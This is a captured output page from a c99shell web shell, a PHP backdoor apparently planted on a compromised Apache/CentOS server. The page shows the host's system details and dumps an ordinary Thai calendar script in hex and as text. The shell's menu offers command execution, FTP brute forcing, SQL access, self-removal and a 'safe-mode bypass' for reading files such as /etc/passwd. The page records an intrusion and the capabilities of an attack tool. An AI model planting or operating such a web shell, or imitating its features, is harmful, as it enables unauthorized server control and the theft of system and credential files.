!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/calendar/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cal_func.php (1.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/calendar/cal_func.php
Size 1.56 KB
MD5 63211f346bceffabc849b5f1959b5a3f
Owner/Group apache/apache
Perms-rw-r--r--
Create time 03/07/2013 18:31:17
Access time 11/07/2024 13:57:11
MODIFY time 26/03/2010 10:52:04

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570
00000588
000005A0
000005B8
000005D0
000005E8
00000600
00000618
00000630
3C 3F 70 68 70 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 20 3D 20 61
72 72 61 79 28 29 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 31
5D 20 20 20 20 20 20 20 20 20 3D 20 22 C1 A1 C3 D2 A4 C1 22 3B 0D 0A 09
24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 32 5D 20 20 20 20 20 20 20 20 20
3D 20 22 A1 D8 C1 C0 D2 BE D1 B9 B8 EC 22 3B 0D 0A 09 24 5F 6D 6F 6E 74
68 5F 6E 61 6D 65 5B 33 5D 20 20 20 20 20 20 20 20 20 3D 20 22 C1 D5 B9
D2 A4 C1 22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 34 5D 20
20 20 20 20 20 20 20 20 3D 20 22 E0 C1 C9 D2 C2 B9 22 3B 0D 0A 09 24 5F
6D 6F 6E 74 68 5F 6E 61 6D 65 5B 35 5D 20 20 20 20 20 20 20 20 20 3D 20
22 BE C4 C9 C0 D2 A4 C1 22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D
65 5B 36 5D 20 20 20 20 20 20 20 20 20 3D 20 22 C1 D4 B6 D8 B9 D2 C2 B9
22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 37 5D 20 20 20 20
20 20 20 20 20 3D 20 22 A1 C3 A1 AF D2 A4 C1 22 3B 0D 0A 09 24 5F 6D 6F
6E 74 68 5F 6E 61 6D 65 5B 38 5D 20 20 20 20 20 20 20 20 20 3D 20 22 CA
D4 A7 CB D2 A4 C1 22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B
39 5D 20 20 20 20 20 20 20 20 20 3D 20 22 A1 D1 B9 C2 D2 C2 B9 22 3B 0D
0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 31 30 5D 20 20 20 20 20 20
20 20 3D 20 22 B5 D8 C5 D2 A4 C1 22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F
6E 61 6D 65 5B 31 31 5D 20 20 20 20 20 20 20 20 3D 20 22 BE C4 C8 A8 D4
A1 D2 C2 B9 22 3B 0D 0A 09 24 5F 6D 6F 6E 74 68 5F 6E 61 6D 65 5B 31 32
5D 20 20 20 20 20 20 20 20 3D 20 22 B8 D1 B9 C7 D2 A4 C1 22 3B 09 0D 0A
0D 0A 0D 0A 0D 0A 09 2F 2F 20 77 68 65 6E 20 69 73 20 6E 6F 77 3F 20 3B
2D 29 0D 0A 09 24 6E 6F 77 20 3D 20 67 6D 64 61 74 65 28 20 22 59 2D 6D
2D 64 22 20 29 3B 0D 0A 09 24 63 75 72 64 61 74 65 20 3D 20 73 70 6C 69
74 28 20 22 2D 22 2C 20 24 6E 6F 77 20 29 3B 0D 0A 0D 0A 0D 0A 09 24 63
75 72 5F 79 65 61 72 20 20 3D 20 69 6E 74 76 61 6C 28 24 63 75 72 64 61
74 65 5B 30 5D 29 3B 0D 0A 09 24 63 75 72 5F 6D 6F 6E 74 68 20 3D 20 69
6E 74 76 61 6C 28 24 63 75 72 64 61 74 65 5B 31 5D 29 3B 0D 0A 09 24 63
75 72 5F 64 61 79 20 20 20 3D 20 69 6E 74 76 61 6C 28 24 63 75 72 64 61
74 65 5B 32 5D 29 3B 0D 0A 09 0D 0A 09 69 66 20 28 20 21 65 6D 70 74 79
28 20 24 5F 52 45 51 55 45 53 54 5B 20 22 59 22 20 5D 20 29 20 29 0D 0A
09 7B 0D 0A 09 09 24 63 61 6C 5F 79 65 61 72 20 3D 20 24 5F 52 45 51 55
45 53 54 5B 20 22 59 22 20 5D 3B 0D 0A 09 7D 20 65 6C 73 65 20 24 63 61
6C 5F 79 65 61 72 20 3D 20 24 63 75 72 5F 79 65 61 72 3B 0D 0A 09 0D 0A
09 69 66 20 28 20 21 65 6D 70 74 79 28 20 24 5F 52 45 51 55 45 53 54 5B
20 22 6D 22 20 5D 20 29 20 29 0D 0A 09 7B 09 0D 0A 09 09 24 63 61 6C 5F
6D 6F 6E 74 68 20 3D 20 24 5F 52 45 51 55 45 53 54 5B 20 22 6D 22 20 5D
3B 0D 0A 09 7D 20 65 6C 73 65 20 24 63 61 6C 5F 6D 6F 6E 74 68 20 3D 20
24 63 75 72 5F 6D 6F 6E 74 68 3B 0D 0A 0D 0A 09 69 66 20 28 20 21 65 6D
70 74 79 28 20 24 5F 52 45 51 55 45 53 54 5B 20 22 64 22 20 5D 20 29 20
29 0D 0A 09 7B 09 0D 0A 09 09 24 63 61 6C 5F 64 61 79 20 3D 20 24 5F 52
45 51 55 45 53 54 5B 20 22 64 22 20 5D 3B 0D 0A 09 7D 20 65 6C 73 65 20
0D 0A 09 7B 0D 0A 09 24 63 61 6C 5F 64 61 79 20 3D 20 24 63 75 72 5F 64
61 79 3B 0D 0A 0D 0A 09 7D 0D 0A 09 2F 2F 20 A4 D3 B9 C7 B3 E0 B4 D7 CD
B9 E1 C5 D0 BB D5 B6 D1 B4 E4 BB 0D 0A 09 24 63 61 6C 5F 6E 65 78 74 5F
79 65 61 72 20 3D 20 24 63 61 6C 5F 79 65 61 72 3B 0D 0A 09 69 66 20 28
20 24 63 61 6C 5F 6D 6F 6E 74 68 20 3C 20 31 32 20 29 0D 0A 09 7B 0D 0A
09 09 24 63 61 6C 5F 6E 65 78 74 5F 6D 6F 6E 74 68 20 3D 20 24 63 61 6C
5F 6D 6F 6E 74 68 20 2B 20 31 3B 0D 0A 09 7D 0D 0A 09 65 6C 73 65 20 0D
0A 09 7B 0D 0A 09 09 24 63 61 6C 5F 6E 65 78 74 5F 6D 6F 6E 74 68 20 3D
20 31 3B 0D 0A 09 09 24 63 61 6C 5F 6E 65 78 74 5F 79 65 61 72 20 3D 20
24 63 61 6C 5F 79 65 61 72 20 2B 20 31 3B 0D 0A 09 7D 0D 0A 09 0D 0A 09
2F 2F 20 A4 D3 B9 C7 B3 E0 B4 D7 CD B9 E1 C5 D0 BB D5 A1 E8 CD B9 CB B9
E9 D2 0D 0A 09 24 63 61 6C 5F 70 72 65 76 5F 79 65 61 72 20 3D 20 24 63
61 6C 5F 79 65 61 72 3B 0D 0A 09 69 66 20 28 20 24 63 61 6C 5F 6D 6F 6E
74 68 20 3E 20 31 20 29 0D 0A 09 7B 0D 0A 09 09 24 63 61 6C 5F 70 72 65
76 5F 6D 6F 6E 74 68 20 3D 20 24 63 61 6C 5F 6D 6F 6E 74 68 20 2D 20 31
3B 0D 0A 09 7D 20 0D 0A 09 65 6C 73 65 20 0D 0A 09 7B 0D 0A 09 09 24 63
61 6C 5F 70 72 65 76 5F 6D 6F 6E 74 68 20 3D 20 31 32 3B 0D 0A 09 09 24
63 61 6C 5F 70 72 65 76 5F 79 65 61 72 20 3D 20 24 63 61 6C 5F 79 65 61
72 20 2D 20 31 3B 0D 0A 09 7D 0D 0A 0D 0A 09 66 75 6E 63 74 69 6F 6E 20
6E 75 6D 5F 64 61 79 73 28 20 24 79 65 61 72 2C 20 24 6D 6F 6E 74 68 20
29 0D 0A 09 7B 0D 0A 09 09 24 6E 75 6D 20 3D 20 33 31 3B 0D 0A 09 09 77
68 69 6C 65 20 28 21 63 68 65 63 6B 64 61 74 65 28 20 24 6D 6F 6E 74 68
2C 20 24 6E 75 6D 2C 20 24 79 65 61 72 20 29 20 29 20 7B 20 24 6E 75 6D
2D 2D 3B 20 7D 0D 0A 09 09 72 65 74 75 72 6E 20 24 6E 75 6D 3B 09 0D 0A
09 7D 0D 0A 09 0D 0A 3F 3E 0D 0A
<?php   $_month_name = a
rray();   $_month_name[1
]         = "มกราคม";  
$_month_name[2]         
= "กุมภาพันธ์";   $_mont
h_name[3]         = "มีน
าคม";   $_month_name[4] 
        = "เมษายน";   $_
month_name[5]         = 
"พฤษภาคม";   $_month_nam
e[6]         = "มิถุนายน
";   $_month_name[7]    
     = "กรกฏาคม";   $_mo
nth_name[8]         = "ส
ิงหาคม";   $_month_name[
9]         = "กันยายน"; 
  $_month_name[10]      
  = "ตุลาคม";   $_month_
name[11]        = "พฤศจิ
กายน";   $_month_name[12
]        = "ธันวาคม";   
       // when is now? ;
-)   $now = gmdate( "Y-m
-d" );   $curdate = spli
t( "-", $now );       $c
ur_year  = intval($curda
te[0]);   $cur_month = i
ntval($curdate[1]);   $c
ur_day   = intval($curda
te[2]);      if ( !empty
( $_REQUEST[ "Y" ] ) )  
{   $cal_year = $_REQU
EST[ "Y" ];   } else $ca
l_year = $cur_year;     
if ( !empty( $_REQUEST[
 "m" ] ) )   {    $cal_
month = $_REQUEST[ "m" ]
;   } else $cal_month = 
$cur_month;     if ( !em
pty( $_REQUEST[ "d" ] ) 
)   {    $cal_day = $_R
EQUEST[ "d" ];   } else 
   {   $cal_day = $cur_d
ay;     }   // คำนวณเดือ
นและปีถัดไป   $cal_next_
year = $cal_year;   if (
 $cal_month < 12 )   {  
$cal_next_month = $cal
_month + 1;   }   else  
  {   $cal_next_month =
 1;   $cal_next_year = 
$cal_year + 1;   }     
// คำนวณเดือนและปีก่อนหน
้า   $cal_prev_year = $c
al_year;   if ( $cal_mon
th > 1 )   {   $cal_pre
v_month = $cal_month - 1
;   }    else    {   $c
al_prev_month = 12;   $
cal_prev_year = $cal_yea
r - 1;   }     function 
num_days( $year, $month 
)   {   $num = 31;   w
hile (!checkdate( $month
, $num, $year ) ) { $num
--; }   return $num;   
}     ?>  

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0117 ]--